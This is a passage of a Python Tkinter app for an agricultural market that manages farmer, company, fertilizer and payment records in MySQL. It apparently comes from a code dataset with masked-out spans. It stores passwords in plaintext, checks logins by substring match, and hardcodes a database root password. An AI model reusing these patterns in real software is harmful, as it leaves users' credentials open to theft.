orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM payment;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_pay():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Transaction farmer id', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Transaction date', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Transaction amount', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Transaction method', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e3.insert(0, datetime.now())\n e4.place(x=350, y=160)\n e5 = StringVar(root)\n e5.set('Debit card')\n w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')\n w.place(x=350, 
y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_pay_command)\n Button.place(x=400, y=400)\n\n\ndef insert_pay_command():\n try:\n sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n payment()\n except:\n insert_pay()\n\n\ndef delete_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_pay_command)\n Button.place(x=400, y=400)\n\n\ndef delete_pay_command():\n try:\n sql = 'DELETE FROM payment WHERE trans_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n payment()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef search_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pa)\n Button.place(x=400, y=400)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef First_page(root):\n global T1, T2, T3\n frame = Frame(root, height=500, width=800, bg='ivory')\n frame.pack()\n label = Label(root, text='WELCOME TO AGRI MARKET', font=(\n 'Times new roman', 25))\n label.place(x=200, y=50)\n button = Button(root, text='LogIn', font=('times new roman', 20),\n command=check_pass, bg='green')\n button.place(x=350, y=350)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=280, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=280, y=250)\n reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=\n 'blue', command=create_pass)\n reg_button.place(x=340, y=400)\n\n\ndef check_pass():\n global root, T1, T2, T3\n try:\n with open('password.txt', 'r') as f:\n lines = f.read()\n if T1.get() + '=' + T2.get() in lines and T1.get(\n ) != '' and T2.get() != '':\n entity_page()\n else:\n label = Label(root, text=\n 'Invalid username or password.Try again', font=(\n 'times new roman', 15))\n label.place(x=200, y=100)\n except:\n label = Label(root, text='Invalid username or password.Try again',\n font=('times new roman', 15))\n label.place(x=200, y=100)\n\n\ndef create_pass():\n global root, T1, T2, T3\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=380, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=380, y=250)\n L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),\n bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width=30, 
show='*', bd=5)\n T3.place(x=380, y=300)\n reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=\n 'blue', command=add_pass)\n reg_button.place(x=440, y=400)\n\n\ndef add_pass():\n global root, T1, T2, T3\n if T2.get() != T3.get():\n label = Label(root, text='Incorrect Password. Enter again', font=(\n 'times new roman', 20))\n label.place(x=100, y=100)\n else:\n try:\n with open('password.txt', 'r') as f:\n data = f.read()\n with open('password.txt', 'w') as f:\n f.write(data + '\\n')\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n except:\n with open('password.txt', 'w') as f:\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n\n\ndef entity_page():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n label = Label(root, text='WELCOME TO AGRI MARKET ', font=(\n 'Times new roman', 20), bg='blue')\n label.place(x=200, y=20)\n label = Label(root, text='Choose the Entity ', font=('Times new roman',\n 20), bg='white')\n label.place(x=250, y=100)\n Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer\n )\n Button.place(x=100, y=150 + 25)\n Button = tk.Button(root, text='Company', font=('Arial', 15), command=\n company)\n Button.place(x=300, y=150 + 25)\n Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command\n =fertilizer)\n Button.place(x=500, y=150 + 25)\n Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)\n Button.place(x=200, y=300 + 25)\n Button = tk.Button(root, text='Payment', font=('Arial', 15), command=\n payment)\n Button.place(x=400, y=300 + 25)\n Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),\n command=history)\n Button.place(x=200, y=400 + 25)\n\n\ndef history():\n global root, cur, db\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])\n data = 
cur.fetchall()\n label = Label(root, text='The Transaction History of this month', font=\n ('Arial', 15))\n label.place(x=200, y=20)\n button = Button(root, text='BACK', command=entity_page)\n button.place(x=20, y=20)\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n db.close()\n db = mysql.connector.connect(host='localhost', user='root', passwd=\n 'bhushi', database='farmer_app')\n cur = db.cursor()\n\n\ndef farmer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_farmer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_farmer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_farmer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), 
command=\n search_farmer)\n Button.place(x=410, y=50)\n view_farmer()\n\n\ndef view_farmer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',\n 'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id', text='Farmer Id')\n table.heading('f_name', text='Farmer Name')\n table.heading('f_phone', text='Farmer Phone')\n table.heading('f_mail', text='Farmer Mail')\n table.heading('f_locality', text='Farmer Locality')\n table.heading('f_address', text='Farmer Address')\n table['show'] = 'headings'\n table.column('f_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM farmer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_farmer():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, 
y=270)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e6 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_farmer_command)\n Button.place(x=400, y=400)\n\n\ndef insert_farmer_command():\n global root\n try:\n sql = 'INSERT INTO farmer values(%s,%s,%s,%s,%s,%s);'\n if len(e1.get()) > 3:\n invalid('farmer')\n else:\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get(), e6.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n insert_farmer()\n\n\ndef invalid(page):\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n if page == 'farmer':\n label = Label(root, text='Enter valid farmer_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_farmer)\n button.place(x=300, y=400)\n elif page == 'company':\n label = Label(root, text='Enter valid company_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_company)\n button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef delete_farmer_command():\n try:\n sql = 'DELETE FROM farmer WHERE f_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n farmer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, 
text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)\n Button.place(x=300, y=400)\n\n\ndef update():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n e6 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_farmer()\n\n\ndef update_command():\n try:\n sql = (\n 'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'\n )\n vals = 
e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n update_farmer()\n\n\ndef search_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)\n Button.place(x=400, y=400)\n\n\ndef search():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',\n 'farmer mail: ', 'farmer locality: ', 'farmer address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_farmer()\n\n\ndef company():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_company)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', 
font=('Arial', 15), command=\n delete_company)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_company)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_company)\n Button.place(x=410, y=50)\n view_company()\n\n\ndef view_company():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),\n xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id', text='Company Id')\n table.heading('c_name', text='Company Name')\n table.heading('c_address', text='Company Address')\n table['show'] = 'headings'\n table.column('c_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM company;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\ndef insert_company():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company_id', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = 
tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_company_command)\n Button.place(x=400, y=400)\n\n\ndef insert_company_command():\n try:\n if len(e1.get()) > 3:\n invalid('company')\n else:\n sql = 'INSERT INTO company values(%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get()\n cur.executemany(sql, [vals])\n db.commit()\n company()\n except:\n insert_company()\n\n\ndef delete_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql = 'DELETE FROM company WHERE c_id=%s;'\n cur.execute(sql, [int(e1.get())])\n db.commit()\n company()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_c():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Company_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, 
y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_c)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_company()\n\n\n<mask token>\n\n\ndef search_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_c)\n Button.place(x=400, y=400)\n\n\ndef search_c():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=company\n )\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['company id: ', 'company name: ', 'company address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Company Id', font=('times new roman', 15)\n )\n l.place(x=100, y=300)\n search_company()\n\n\ndef fertilizer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer Table', font=('Times new roman', \n 15), bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button 
= tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_fer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_fer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_fer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fer)\n Button.place(x=410, y=50)\n view_fer()\n\n\ndef view_fer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',\n 'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.\n set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula', text='Fertilizer Formula')\n table.heading('fe_name', text='Fertilizer name')\n table.heading('fe_content', text='Fertilizer content')\n table.heading('fe_price', text='Fertilizer price')\n table.heading('company_id', text='Company_id')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM fertilizer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_fer_command():\n try:\n sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\n\n\ndef delete_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = 
Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n fertilizer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)\n Button.place(x=300, y=400)\n\n\ndef update_fe():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Fertlizer formula', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Fertlizer name', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Fertlizer content', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Fertlizer price', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='comapny_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in 
data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_fe)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_fer()\n\n\n<mask token>\n\n\ndef search_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fe)\n Button.place(x=400, y=400)\n\n\ndef search_fe():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['fertilizer formula: ', 'fertilizer name: ',\n 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Fertilizer formula', font=(\n 'times new roman', 15))\n l.place(x=100, y=300)\n search_fer()\n\n\ndef orders():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Orders Table', 
